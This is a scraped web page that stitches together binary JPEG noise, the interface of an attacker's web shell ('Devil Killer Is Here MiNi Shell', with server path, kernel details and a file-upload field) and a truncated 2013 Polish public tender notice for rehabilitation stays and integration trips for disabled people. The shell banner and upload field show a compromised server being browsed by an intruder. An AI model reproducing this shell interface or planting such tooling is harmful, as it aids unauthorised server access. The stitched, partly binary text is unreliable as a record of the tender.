JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130422/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130422/60415-N-2013.html

<p class="kh_header"><b>Inowrocław: Zorganizowanie i przeprowadzenie: turnusu rehabilitacyjnego zgodnie z rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007 r. w sprawie turnusów rehabilitacyjnych (Dz. U. Nr 230, poz.1694); zespołu ćwiczeń fizycznych usprawniających psychoruchowo lub zajęć rehabilitacyjnych (wyjazd zdrowotny) dla osób niepełnosprawnych; wyjazdów integracyjnych dla czterech grup uczestników.</b><br>
<b>Numer ogłoszenia: 60415 - 2013; data zamieszczenia: 22.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. Mątewska 17, 88-100 Inowrocław, woj. kujawsko-pomorskie, tel. 0-52 35 92 255, faks 0-52 35 92 255.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcpr.inowroclaw.info</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie: turnusu rehabilitacyjnego zgodnie z rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007 r. w sprawie turnusów rehabilitacyjnych (Dz. U. Nr 230, poz.1694); zespołu ćwiczeń fizycznych usprawniających psychoruchowo lub zajęć rehabilitacyjnych (wyjazd zdrowotny) dla osób niepełnosprawnych; wyjazdów integracyjnych dla czterech grup uczestników..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie:
1) Turnusu rehabilitacyjnego dla 54 osób niepełnosprawnych w okresie czerwiec/lipiec/sierpień 2013 r.;
2) Zespołu ćwiczeń fizycznych usprawniających psychoruchowo lub zajęć rehabilitacyjnych dla  18 osób niepełnosprawnych (wyjazd zdrowotny) w okresie czerwiec/lipiec/sierpień 2013 r.;
3) Wyjazdu integracyjnego dla osób dorosłych z dziećmi w okresie lipiec/sierpień 2013 r.;
4) Wyjazdu integracyjnego dla 10 osób w I połowie lipca 2013 r.;
5) Wyjazdu integracyjnego dla 15 osób w  I połowie lipca 2013 r.;
6) Wyjazdu integracyjnego dla młodzieży - 13 uczniów Zespołu Szkół Integracyjnych w I połowie lipca 2013 r.
Przedmiot zamówienia składa się zatem z 6 odrębnych części. Każda część zamówienia może być zrealizowana przez innego Wykonawcę i na każdą część zamówienia należy złożyć odrębną ofertę.
Grupy uczestników, utworzone i skierowane przez Zamawiającego do udziału w wyjazdach, są objęte realizowanym w 2013 r. w ramach Priorytetu VII Programu Operacyjnego Kapitał Ludzki projektem systemowym Podróż w usamodzielnienie..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających - zgodnie z art. 67 ust 1 pkt 6 Ustawy Prawo zamówień publicznych.
Zakres zamówień uzupełniających będzie zgodna z zakresem każdej z sześciu części zamówienia podstawowego. Wielkość zamówień uzupełniających będzie wynikać z bieżących potrzeb Zamawiającego i nie przekroczy 50% wielkości każdej z sześciu części zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.31.25.00-4, 55.24.00.00-4, 55.27.00.00-3, 63.50.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla części I i II zamówienia ocena będzie dokonana na podstawie:
- wpisu Wykonawcy do rejestru organizatorów turnusów prowadzonego przez wojewodę - zgodnie z art.10c  ust.2 ustawy z dnia 27 sierpnia 1997 roku o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych (Dz.U. z 2011 r. Nr 127 , poz.721 z późn. zm);
- wpisu ośrodka Wykonawcy do rejestru ośrodków prowadzonego przez wojewodę - zgodnie z art.10c  ust.2 ustawy z dnia 27 sierpnia 1997 roku o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych (Dz.U. z 2011 r. Nr 127 , poz.721 z późn.zm).
Dla części III, IV,V i VI zamówienia ocena będzie dokonana na podstawie:
- zezwolenia na działalność gospodarczą w zakresie organizowania imprez turystycznych,
- zaświadczenia o wpisie do Rejestru Organizatorów i Pośredników Turystycznych.
Wykonawca posiadający ważne ww. zezwolenia i wpisy, który wraz z ofertą przedłoży odpowiednie dokumenty, będzie spełniać ten warunek.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena będzie dokonana na podstawie załączonego do oferty wykazu wykonanych, 
a w przypadku świadczeń okresowych lub ciągłych również wykonywanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia (załącznik 2.), których należyte wykonanie jest potwierdzone załączonymi do wykazu odpowiednimi dowodami. Wykonawca, który wykaże i udokumentuje należyte przeprowadzenie usługi/usług w wymaganym zakresie, będzie spełniać ten warunek.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena będzie dokonana na podstawie załączonego do oferty wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych Wykonawcy w celu realizacji zamówienia (załącznik 3.). W ramach wykazu wymagane jest również podanie informacji na temat prawa do dysponowania potencjałem technicznym, a w przypadku korzystania z zasobów innego podmiotu/innych podmiotów - pisemne zobowiązanie podmiotu/podmiotów do udostępnienia tychże zasobów na potrzeby realizacji przedmiotowego zadania. Wykonawca, którego wykaz i dołączone do niego dodatkowe dokumenty będą wskazywać na to, że na potrzeby realizacji zamówienia zostaną zapewnione odpowiednie warunki, będzie spełniać ten warunek.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena będzie dokonana na podstawie załączonego do oferty wykazu osób wyznaczonych do realizacji zamówienia (załącznik 4.) oraz oświadczenia, że osoby, które będą uczestniczyć 
w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. Wykonawca, który wykaże, że w celu wykonywania czynności objętych przedmiotem zamówienia będzie dysponować osobami posiadającymi niezbędne kwalifikacje i uprawnienia, będzie spełniać ten warunek.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena będzie dokonana na podstawie załączonego do oferty oświadczenia Wykonawcy 
o znajdowaniu się w sytuacji ekonomicznej i finansowej, zapewniającej wykonanie zamówienia. Wykonawca, który złoży stosowne oświadczenie, będzie spełniać ten warunek.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">inne dokumenty dotyczące sytuacji ekonomicznej i finansowej:<br>Oświadczenie Wykonawcy o znajdowaniu się w sytuacji ekonomicznej i finansowej, zapewniającej wykonanie zamówienia.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Szczegółowy program wyjazdu.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się możliwość dokonania zmiany postanowień zawartej umowy w zakresie informacji zawartych w Wykazie osób wyznaczonych do realizacji zamówienia (załącznik 4.), na następujących warunkach:
a) zmiany dokonać można wyłącznie w sytuacji, gdy konieczność jej dokonania wynika z przyczyn losowych, całkowicie niezależnych od Wykonawcy,
b) osoba/y wyznaczona/e w ramach zmiany do realizacji zamówienia będzie/będą posiadać kwalifikacje i uprawnienia co najmniej równe kwalifikacjom i uprawnieniom osób wyszczególnionych w złożonej ofercie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.pcpr.inowroclaw.info/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Inowrocławiu ul Mątewska 17, 88-100 Inowrocław pok. 132.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.05.2013 godzina 08:30, miejsce: Powiatowe Centrum Pomocy Rodzinie w Inowrocławiu ul Mątewska 17, 88-100 Inowrocław pok. 133.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wszystkie części zamówienia będą współfinansowane przez Unię Europejską w ramach środków Europejskiego Funduszu Społecznego. Zamówienie jest objęte realizowanym w 2013 r. w ramach Priorytetu VII Programu Operacyjnego Kapitał Ludzki projektem systemowym Podróż w usamodzielnienie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Turnus rehabilitacyjny dla osób niepełnosprawnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Charakterystyka grupy:
54 osoby niepełnosprawne w różnym wieku i z różnymi schorzeniami + 1 opiekun osoby niepełnosprawnej.  W grupie znajdują się dwie osoby niedowidzące, z których jedna pojedzie na turnus z psem przewodnikiem; jedna osoba poruszająca się na wózku inwalidzkim oraz jedna osoba poruszająca się za pomocą kul.
Zamawiający zastrzega sobie prawo do zmniejszenia liczby uczestników o max. 2 osoby.
2. Termin wyjazdu: czerwiec/lipiec/sierpień 2013 r.
3. Ilość dni: 14.
4. Miejsce pobytu: 
Ośrodek rehabilitacyjny, przystosowany dla osób niepełnosprawnych - w tym poruszających się na wózkach inwalidzkich, z możliwością pobytu z psem przewodnikiem W przypadku ośrodka, w miejscowości nadmorskiej - ośrodek rehabilitacyjny zlokalizowany blisko morza w miejscu, w którym istnieje możliwość zejścia na plażę dla osób poruszających się na wózkach inwalidzkich.
5. Pozostałe wymagania względem Wykonawcy:
a) zapewnienie wyspecjalizowanej kadry do realizacji przedmiotu zamówienia,
b) przeprowadzenie 2 badań lekarskich (pierwsze zakończone zaordynowaniem zabiegów leczniczych),
c) zapewnienie opieki opiekuna - osoby odpowiedzialnej za organizację i realizację zajęć rehabilitacyjnych,
d) zapewnienie transportu klimatyzowanym pojazdem z Inowrocławia do miejsca pobytu i z powrotem, dla wszystkich uczestników, 1 opiekuna osoby niepełnosprawnej i psa przewodnika; autokar powinien być przystosowany dla osób poruszających się za pomocą wózka inwalidzkiego,
e) zapewnienie ubezpieczenia dla całej grupy na czas przejazdów 
i pobytu; niezwłocznie po podpisaniu umowy na realizacje przedmiotowego zadania Wykonawca przedstawi Zamawiającemu polisę potwierdzającą obowiązkowe ubezpieczenie uczestników wyjazdu od następstw nieszczęśliwych wypadków powstałych w trakcie pobytu oraz w trakcie wszelkich przejazdów z nim związanych,
f) zapewnienie noclegów dla uczestników w pokojach 2, 3 i 4 osobowych z pełnym węzłem sanitarnym i TV, zapewnienie noclegu w pokoju 1 osobowym dla osoby niepełnosprawnej z psem przewodnikiem; wymagane jest aby wszystkie ww. pokoje zlokalizowane były w jednym budynku,
g) oznakowanie pomieszczeń i sal wyznaczonych do realizacji przedmiotu zamówienia - poprzez zastosowanie odpowiednich logotypów oraz informacji o współfinansowaniu turnusu ze środków Europejskiego Funduszu Społecznego,
h) zapewnienie pełnego wyżywienia - 3 posiłki dziennie - dla wszystkich uczestników turnusu,
i) zapewnienie suchego prowiantu podczas ewentualnych wyjazdów organizowanych w ramach turnusu,
j) zapewnienie opieki medycznej na czas pobytu oraz wszelkich przejazdów z nim związanych,
k) zapewnienie środka transportu niezbędnego do ewentualnych przejazdów objętych programem turnusu; w cenę oferty muszą zostać wkalkulowane wszystkie koszty 
z tym związane,
l) wkalkulowanie w cenę oferty wszelkich kosztów związanych z realizacją programu turnusu (np. koszty wstępu do obiektów przewidzianych w programie, koszty przejazdów w trakcie pobytu, opłaty klimatyczne),
m) przekazanie każdemu uczestnikowi turnusu rehabilitacyjnego imiennego zaświadczenia o jego odbyciu,
n) dostarczenie Zamawiającemu:
- dokumentów określonych w rozporządzeniu Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007 r. w sprawie turnusów rehabilitacyjnych (Dz. U. Nr 230, poz. 1694), a w szczególności Informacji o przebiegu turnusu,
- płyty CD z dokumentacją fotograficzną z pobytu uczestników w ośrodku i odbywania zajęć rehabilitacyjnych,
- innych dokumentów, o których wypełnienie zwróci się do Wykonawcy Zamawiający..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.24.00.00-4, 55.27.00.00-3, 63.50.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Potencjał bazy - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zespół ćwiczeń fizycznych usprawniających psychoruchowo lub zajęć rehabilitacyjnych (wyjazd zdrowotny).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Charakterystyka grupy:
18 osób niepełnosprawnych w różnym wieku i z różnymi schorzeniami.
